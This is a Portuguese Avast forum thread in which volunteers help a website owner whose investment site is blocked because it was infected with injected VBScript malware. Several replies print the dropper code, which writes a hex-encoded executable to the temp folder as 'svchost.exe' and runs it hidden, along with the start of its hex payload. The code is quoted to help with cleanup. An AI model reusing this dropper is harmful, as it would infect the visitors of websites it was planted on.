Avast WEBforum
Non-English Zone => Português => Topic started by: Hemerich27 on May 14, 2014, 01:35:53 PM
-
o avast esta a bloquear meu site o que eu faço ? sempre que eu ou outro usuario deseja entrar no site temos que esta a desativar o avast ,me ajudem por favor ,,, o site è esse hxtp://hemerichinvestimento.com/ ,desde ja obrigado ..
-
Para verificar se um site está limpo, utilize:
http://dnscheck.pingdom.com
http://www.siteadvisor.com
Para verificar se um site está hospedado em afraid.org, vá para http://freedns.afraid.org/ e digite o URL na caixa do canto superior direito e, depois, clique no botão "Trace". Qualquer domínio hospedado em afraid.org pode ser utilizado por outras pessoas para hospedagem (DNS hosting) sem o seu controle. Se isto acontecer com o seu domínio, ele pode ter sido utilizado para finalidades maliciosas. Neste caso, quando ninguém tem o controle dos subdomínios (DNS hijacking), o avast! bloqueia todo o domínio para proteger os seus usuários. Provavelmente, a solução será trocar a hospedagem do DNS e voltar a nos informar (www.avast.com/contact-form.php).
-
Hello,
after closing html tag, there is malicious code -- see attached image.
Milos
-
Para verificar se um site está limpo, utilize:
http://dnscheck.pingdom.com
http://www.siteadvisor.com
Para verificar se um site está hospedado em afraid.org, vá para http://freedns.afraid.org/ e digite o URL na caixa do canto superior direito e, depois, clique no botão "Trace". Qualquer domínio hospedado em afraid.org pode ser utilizado por outras pessoas para hospedagem (DNS hosting) sem o seu controle. Se isto acontecer com o seu domínio, ele pode ter sido utilizado para finalidades maliciosas. Neste caso, quando ninguém tem o controle dos subdomínios (DNS hijacking), o avast! bloqueia todo o domínio para proteger os seus usuários. Provavelmente, a solução será trocar a hospedagem do DNS e voltar a nos informar (www.avast.com/contact-form.php).
Domínio consultado: www.hemerichinvestimento.com
ns1.afraid.org não foi encontrado na lista de nomes.
-
Para verificar se um site está limpo, utilize:
http://dnscheck.pingdom.com
http://www.siteadvisor.com
Para verificar se um site está hospedado em afraid.org, vá para http://freedns.afraid.org/ e digite o URL na caixa do canto superior direito e, depois, clique no botão "Trace". Qualquer domínio hospedado em afraid.org pode ser utilizado por outras pessoas para hospedagem (DNS hosting) sem o seu controle. Se isto acontecer com o seu domínio, ele pode ter sido utilizado para finalidades maliciosas. Neste caso, quando ninguém tem o controle dos subdomínios (DNS hijacking), o avast! bloqueia todo o domínio para proteger os seus usuários. Provavelmente, a solução será trocar a hospedagem do DNS e voltar a nos informar (www.avast.com/contact-form.php).
Domínio consultado: www.hemerichinvestimento.com
ns1.afraid.org não foi encontrado na lista de nomes.
nao foi encontrado no afraid.org e agora ?
-
A Detecção é correta
foi detectado um código do iframe malicioso como disse Milos
(http://i.imgur.com/nRGehTJ.png)
41 arquivos maliciosos
http://quttera.com/detailed_report/hemerichinvestimento.com
•VBScript Injection (GJS174)
(http://i.imgur.com/D3S8NIJ.png)
http://killmalware.com/hemerichinvestimento.com/
-
A Detecção é correta
foi detectado um código do iframe malicioso como disse Milos
(http://i.imgur.com/nRGehTJ.png)
41 arquivos maliciosos
http://quttera.com/detailed_report/hemerichinvestimento.com
•VBScript Injection (GJS174)
(http://i.imgur.com/D3S8NIJ.png)
http://killmalware.com/hemerichinvestimento.com/
mais oque eu posso fazer para consertar isso ,gastei tanto dinheiro para colocar esse site no ar :( me ajudar por favor ,ja tenho a cabeça a doer rsrs ,,,desculpa chatear tanto ,porque quero passar segurança para as pessoas que entrar no site ,e ainda mais um site de investimentos ...
-
você é administrador do site
faça a limpeza
570 Set FSO = CreateObject("Scripting.FileSystemObject")
571 DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
572 If FSO.FileExists(DropPath)=False Then
573 Set FileObj = FSO.CreateTextFile(DropPath, True)
574 For i = 1 To Len(WriteData) Step 2
575 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
576 Next
577 FileObj.Close
578 End If
579 Set WSHshell = CreateObject("WScript.Shell")
580 WSHshell.Run DropPath, 0
//--></SCRIPT><!--��8i�����"�W�y�t��l�������Ex+�b�ա'16�`j���,��`q�������<���bVKu(����!A�ڏ�Ö|`�������D�**_��@ݝ`���U�ZA�[��^ &nbs
p; �a4�nۋ� �H��+J���D�ӷ ��J�<<�\D� �Lk��3��� ��/����_O����3]����?[��.r�/�������7�nFL����#�����a����K��
5535;3M(���ǜ�����`8���[�&xC�&iD�K�o�
-
você é administrador do site
faça a limpeza
570 Set FSO = CreateObject("Scripting.FileSystemObject")
571 DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
572 If FSO.FileExists(DropPath)=False Then
573 Set FileObj = FSO.CreateTextFile(DropPath, True)
574 For i = 1 To Len(WriteData) Step 2
575 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
576 Next
577 FileObj.Close
578 End If
579 Set WSHshell = CreateObject("WScript.Shell")
580 WSHshell.Run DropPath, 0
//--></SCRIPT><!--��8i�����"�W�y�t��l�������Ex+�b�ա'16�`j���,��`q�������<���bVKu(����!A�ڏ�Ö|`�������D�**_��@ݝ`���U�ZA�[��^ &nbs
p; �a4�nۋ� �H��+J���D�ӷ ��J�<<�\D� �Lk��3��� ��/����_O����3]����?[��.r�/�������7�nFL����#�����a����K��
5535;3M(���ǜ�����`8���[�&xC�&iD�K�o�
ok basta eu limpar isso ai q fica so o ouro :)? obrigado mesmo
-
ok basta eu limpar isso ai q fica so o ouro :)? obrigado mesmo
sim.mas inicio da linha do código começa a aqui e termina onde mencionei acima
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000E80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000219891FC65F9FFAF65F9FFAF65F9FFAFA3E6A2AF67F9FFAFE246E6AF25F8FFAFDABCA0AF78F9FFAF87B0A0AF64F9FFAFA6F6A0AF47F9FFAF7EB4F0AF69F9FFAFB75BA5
... 163465 bytes are skipped ...
-
ok basta eu limpar isso ai q fica so o ouro :)? obrigado mesmo
sim.mas inicio da linha do código começa a aqui e termina onde mencionei acima
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000E80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000219891FC65F9FFAF65F9FFAF65F9FFAFA3E6A2AF67F9FFAFE246E6AF25F8FFAFDABCA0AF78F9FFAF87B0A0AF64F9FFAFA6F6A0AF47F9FFAF7EB4F0AF69F9FFAFB75BA5
... 163465 bytes are skipped ...
[/quote] ok obrigado ,,,mais deixa eu fazer uma pergunta eu tenho que limpar isso no codigo fonte do script ou nos arquivos ftp eu consigo apagar isso ,se fosse eu a fazer claro ,tenho acesso ao cpanel e nos arquivos ftp ,,mais nao tenho acesso ao codigo fonte do script ,,desculpa chatear :)
-
ok obrigado ,,,mais deixa eu fazer uma pergunta eu tenho que limpar isso no codigo fonte do script ou nos arquivos ftp eu consigo apagar isso ,se fosse eu a fazer claro ,tenho acesso ao cpanel e nos arquivos ftp ,,mais nao tenho acesso ao codigo fonte do script ,,desculpa chatear :)
Remova o código
se este mesmo arquivos esta localizado na pasta FTP
Depois irei analisar para saber se site foi limpo e se possui o alerta da detecção
-
desculpa a chatear ,,nao conseguir encontrar :( ,,nem sei por onde começar ,,ea pessoa que me veneu o script nao m responde :( pra dar uma assistençia ,uma obs: fiz um teste hoje desistalei o avast e instalei outro antivirus e nao acusam nada roda normalmente ..mais assim como eu milhoes de pessoas preferem o avast :(
-
desculpa a chatear ,,nao conseguir encontrar :( ,,nem sei por onde começar ,,ea pessoa que me veneu o script nao m responde :( pra dar uma assistençia ,uma obs: fiz um teste hoje desistalei o avast e instalei outro antivirus e nao acusam nada roda normalmente ..mais assim como eu milhoes de pessoas preferem o avast :(
Não podemos desbloquear uma URL que esta infectada com Worm infectante ,um arquivo de VBS Script.
Os usuários do avast estão bem protegidos. Mudar de antivírus,acham que vão resolver o problema, é uma ideia inútil.
VBScript é semelhante em função de JavaScript. Ele é usado para escrever funções executáveis que são incorporados ou incluídos a partir de páginas HTML e interagir com o Document Object Model (DOM) da página, para executar tarefas não possíveis em HTML sozinho.
VBScript também é usado para o processamento do lado do servidor de páginas web, mais notavelmente com o Microsoft Active Server Pages (ASP). O motor ASP e tipo biblioteca, asp.dll, invoca vbscript.dll para executar scripts VBScript. VBScript que está incorporado em uma página ASP está contido dentro de <% e%> trocas de contexto. O exemplo a seguir de uma página ASP com VBScript exibe o atual
http://en.wikipedia.org/wiki/VBScript
-
desculpa a chatear ,,nao conseguir encontrar :( ,,nem sei por onde começar ,,ea pessoa que me veneu o script nao m responde :( pra dar uma assistençia ,uma obs: fiz um teste hoje desistalei o avast e instalei outro antivirus e nao acusam nada roda normalmente ..mais assim como eu milhoes de pessoas preferem o avast :(
Não podemos desbloquear uma URL que esta infectada com Worm infectante ,um arquivo de VBS Script.
Os usuários do avast estão bem protegidos. Mudar de antivírus,acham que vão resolver o problema, é uma ideia inútil.
VBScript é semelhante em função de JavaScript. Ele é usado para escrever funções executáveis que são incorporados ou incluídos a partir de páginas HTML e interagir com o Document Object Model (DOM) da página, para executar tarefas não possíveis em HTML sozinho.
VBScript também é usado para o processamento do lado do servidor de páginas web, mais notavelmente com o Microsoft Active Server Pages (ASP). O motor ASP e tipo biblioteca, asp.dll, invoca vbscript.dll para executar scripts VBScript. VBScript que está incorporado em uma página ASP está contido dentro de <% e%> trocas de contexto. O exemplo a seguir de uma página ASP com VBScript exibe o atual
http://en.wikipedia.org/wiki/VBScript
sim mais eu nao mudei de antivirus so desinstalei para fazer teste eu disse,,, eu e melhoes referem o avast .Desculpa se disse algo de mais ,so queria resolver meu problema ,,para começar a partilhar e divulgar meu site ,so q nao estou conseguindo ,,aliaz nao sei nem por onde começar so queria que meu site estivesse nos conformes ,,de boa eo cara que me vendeu nao me da assistençia :( desculpa o encomodo ai è que sou meio fraco quanto a resolver esses tipos de problemas :(
-
desculpa a chatear ,,nao conseguir encontrar :( ,,nem sei por onde começar ,,ea pessoa que me veneu o script nao m responde :( pra dar uma assistençia ,uma obs: fiz um teste hoje desistalei o avast e instalei outro antivirus e nao acusam nada roda normalmente ..mais assim como eu milhoes de pessoas preferem o avast :(
Não podemos desbloquear uma URL que esta infectada com Worm infectante ,um arquivo de VBS Script.
Os usuários do avast estão bem protegidos. Mudar de antivírus,acham que vão resolver o problema, é uma ideia inútil.
VBScript é semelhante em função de JavaScript. Ele é usado para escrever funções executáveis que são incorporados ou incluídos a partir de páginas HTML e interagir com o Document Object Model (DOM) da página, para executar tarefas não possíveis em HTML sozinho.
VBScript também é usado para o processamento do lado do servidor de páginas web, mais notavelmente com o Microsoft Active Server Pages (ASP). O motor ASP e tipo biblioteca, asp.dll, invoca vbscript.dll para executar scripts VBScript. VBScript que está incorporado em uma página ASP está contido dentro de <% e%> trocas de contexto. O exemplo a seguir de uma página ASP com VBScript exibe o atual
http://en.wikipedia.org/wiki/VBScript
sim mais eu nao mudei de antivirus so desinstalei para fazer teste eu disse,,, eu e melhoes referem o avast .Desculpa se disse algo de mais ,so queria resolver meu problema ,,para começar a partilhar e divulgar meu site ,so q nao estou conseguindo ,,aliaz nao sei nem por onde começar so queria que meu site estivesse nos conformes ,,de boa eo cara que me vendeu nao me da assistençia :( desculpa o encomodo ai è que sou meio fraco quanto a resolver esses tipos de problemas :(
ate o google me bloqueou o site ,voçe nao pode me ajudar ?
-
ate o google me bloqueou o site ,voçe nao pode me ajudar ?
Eles agiram da maneira correta
o Avast detecta como VBS:Agent-KZ[trj] é legitimo não é um falso positivo
detectado código malicioso
comodo detectou Virus.VBS.Ramnit.c
http://app.webinspector.com/public/reports/21952964
Foi adicionado a lista negra
Esta infecção foi descoberto e os fornecedores de antivírus adicionou a sua detecção em seus bancos de dados de vírus
veja em anexo.
https://www.virustotal.com/en/url/0e7b098162f6730ed9c34e3726c616da2b89c1aec5da1f79e837153fa1825fd9/analysis/1400376111/
http://sitecheck.sucuri.net/results/www.hemerichinvestimento.com
http://www.hemerichinvestimento.com/assets/js/jquery.js
hxxp://www.hemerichinvestimento.com/banner/scripts/jquery.mobile.customized.min.js
hxxp://www.hemerichinvestimento.com/banner/scripts/jquery.easing.1.3.js
hxxp://www.hemerichinvestimento.com/banner/scripts/camera.min.js
hxxp://www.hemerichinvestimento.com/assets/js/google-code-prettify/prettify.js
hxxp://www.hemerichinvestimento.com/assets/js/transition.js
hxxp://www.hemerichinvestimento.com/assets/js/alert.js
hxxp://www.hemerichinvestimento.com/assets/js/modal.js
hxxp://www.hemerichinvestimento.com/assets/js/dropdown.js
esta infectado
http://zulu.zscaler.com/submission/show/d8555b7124a4e6bdf76a9a20766bc964-1400375529
-
ate o google me bloqueou o site ,voçe nao pode me ajudar ?
Eles agiram da maneira correta
o Avast detecta como VBS:Agent-KZ[trj] é legitimo não é um falso positivo
detectado código malicioso
comodo detectou Virus.VBS.Ramnit.c
http://app.webinspector.com/public/reports/21952964
Foi adicionado a lista negra
Esta infecção foi descoberto e os fornecedores de antivírus adicionou a sua detecção em seus bancos de dados de vírus
veja em anexo.
https://www.virustotal.com/en/url/0e7b098162f6730ed9c34e3726c616da2b89c1aec5da1f79e837153fa1825fd9/analysis/1400376111/
http://sitecheck.sucuri.net/results/www.hemerichinvestimento.com
http://www.hemerichinvestimento.com/assets/js/jquery.js
hxxp://www.hemerichinvestimento.com/banner/scripts/jquery.mobile.customized.min.js
hxxp://www.hemerichinvestimento.com/banner/scripts/jquery.easing.1.3.js
hxxp://www.hemerichinvestimento.com/banner/scripts/camera.min.js
hxxp://www.hemerichinvestimento.com/assets/js/google-code-prettify/prettify.js
hxxp://www.hemerichinvestimento.com/assets/js/transition.js
hxxp://www.hemerichinvestimento.com/assets/js/alert.js
hxxp://www.hemerichinvestimento.com/assets/js/modal.js
hxxp://www.hemerichinvestimento.com/assets/js/dropdown.js
esta infectado
http://zulu.zscaler.com/submission/show/d8555b7124a4e6bdf76a9a20766bc964-1400375529
valeu ai ,entao meu site ja era neh ,,que mer... gastei tanto tempo e dinheiro com isso
-
ate o google me bloqueou o site ,voçe nao pode me ajudar ?
Eles agiram da maneira correta
o Avast detecta como VBS:Agent-KZ[trj] é legitimo não é um falso positivo
detectado código malicioso
comodo detectou Virus.VBS.Ramnit.c
http://app.webinspector.com/public/reports/21952964
Foi adicionado a lista negra
Esta infecção foi descoberto e os fornecedores de antivírus adicionou a sua detecção em seus bancos de dados de vírus
veja em anexo.
https://www.virustotal.com/en/url/0e7b098162f6730ed9c34e3726c616da2b89c1aec5da1f79e837153fa1825fd9/analysis/1400376111/
http://sitecheck.sucuri.net/results/www.hemerichinvestimento.com
http://www.hemerichinvestimento.com/assets/js/jquery.js
hxxp://www.hemerichinvestimento.com/banner/scripts/jquery.mobile.customized.min.js
hxxp://www.hemerichinvestimento.com/banner/scripts/jquery.easing.1.3.js
hxxp://www.hemerichinvestimento.com/banner/scripts/camera.min.js
hxxp://www.hemerichinvestimento.com/assets/js/google-code-prettify/prettify.js
hxxp://www.hemerichinvestimento.com/assets/js/transition.js
hxxp://www.hemerichinvestimento.com/assets/js/alert.js
hxxp://www.hemerichinvestimento.com/assets/js/modal.js
hxxp://www.hemerichinvestimento.com/assets/js/dropdown.js
esta infectado
http://zulu.zscaler.com/submission/show/d8555b7124a4e6bdf76a9a20766bc964-1400375529
valeu ai ,entao meu site ja era neh ,,que mer... gastei tanto tempo e dinheiro com isso
me diz oq fazer pra tentar consertar isso ,onde eu vou seila ,,to perdido..
-
eu fiz a limpeza atravez do cpanel ,nao sei s fiz bem pode dar uma olhada se continua a mesma coisa ou se mudou algo? porfavor ,obrigado
-
eu fiz a limpeza atravez do cpanel ,nao sei s fiz bem pode dar uma olhada se continua a mesma coisa ou se mudou algo? porfavor ,obrigado
Está limpo
Não há nenhum alerta do avast
Você irá refazer o site, já que ele foi completamente comprometido.
Foram acrescentado mais 4 na Blacklist AlienVault,malwares.com URL Checker...
https://www.virustotal.com/en/url/0e7b098162f6730ed9c34e3726c616da2b89c1aec5da1f79e837153fa1825fd9/analysis/
(http://i.imgur.com/A9IKixG.png)
-
eu fiz a limpeza atravez do cpanel ,nao sei s fiz bem pode dar uma olhada se continua a mesma coisa ou se mudou algo? porfavor ,obrigado
Está limpo
Não há nenhum alerta do avast
Você irá refazer o site, já que ele foi completamente comprometido.
Foram acrescentado mais 4 na Blacklist AlienVault,malwares.com URL Checker...
https://www.virustotal.com/en/url/0e7b098162f6730ed9c34e3726c616da2b89c1aec5da1f79e837153fa1825fd9/analysis/
(http://i.imgur.com/A9IKixG.png)
sim preferi excluir tudo ,,agora vou voltar a instalar o script,,mais eo dominio nao fica comprometido ?
-
sim preferi excluir tudo ,,agora vou voltar a instalar o script,,mais eo dominio nao fica comprometido ?
já está ,você terá que remover da lista
mas para isso tem que ser feito uma ánalise
http://www.google.com/safebrowsing/diagnostic?site=hemerichinvestimento.com
http://wepawet.iseclab.org/view.php?hash=67b04c268ad5d580404c21a1bffcb9a9&t=1400378531&type=js
-
sim preferi excluir tudo ,,agora vou voltar a instalar o script,,mais eo dominio nao fica comprometido ?
já está ,você terá que remover da lista
mas para isso tem que ser feito uma ánalise
http://www.google.com/safebrowsing/diagnostic?site=hemerichinvestimento.com
http://wepawet.iseclab.org/view.php?hash=67b04c268ad5d580404c21a1bffcb9a9&t=1400378531&type=js
depois que instalar deixo aqui um aviso para vc dar uma olhada ,obrigado por tudo
-
sim preferi excluir tudo ,,agora vou voltar a instalar o script,,mais eo dominio nao fica comprometido ?
já está ,você terá que remover da lista
mas para isso tem que ser feito uma ánalise
http://www.google.com/safebrowsing/diagnostic?site=hemerichinvestimento.com
http://wepawet.iseclab.org/view.php?hash=67b04c268ad5d580404c21a1bffcb9a9&t=1400378531&type=js
ola jefferson ja esta ,pode dar uma olhada e como faço para tirar essa mensagen do google ? obrigado pela sua ajuda
-
ola jefferson ja esta ,pode dar uma olhada e como faço para tirar essa mensagen do google ? obrigado pela sua ajuda
sinto muito não posso resolver seu problema
mas o avast continua bloqueando o acesso ao site pelo virus
http://urlquery.net/report.php?id=1400789375062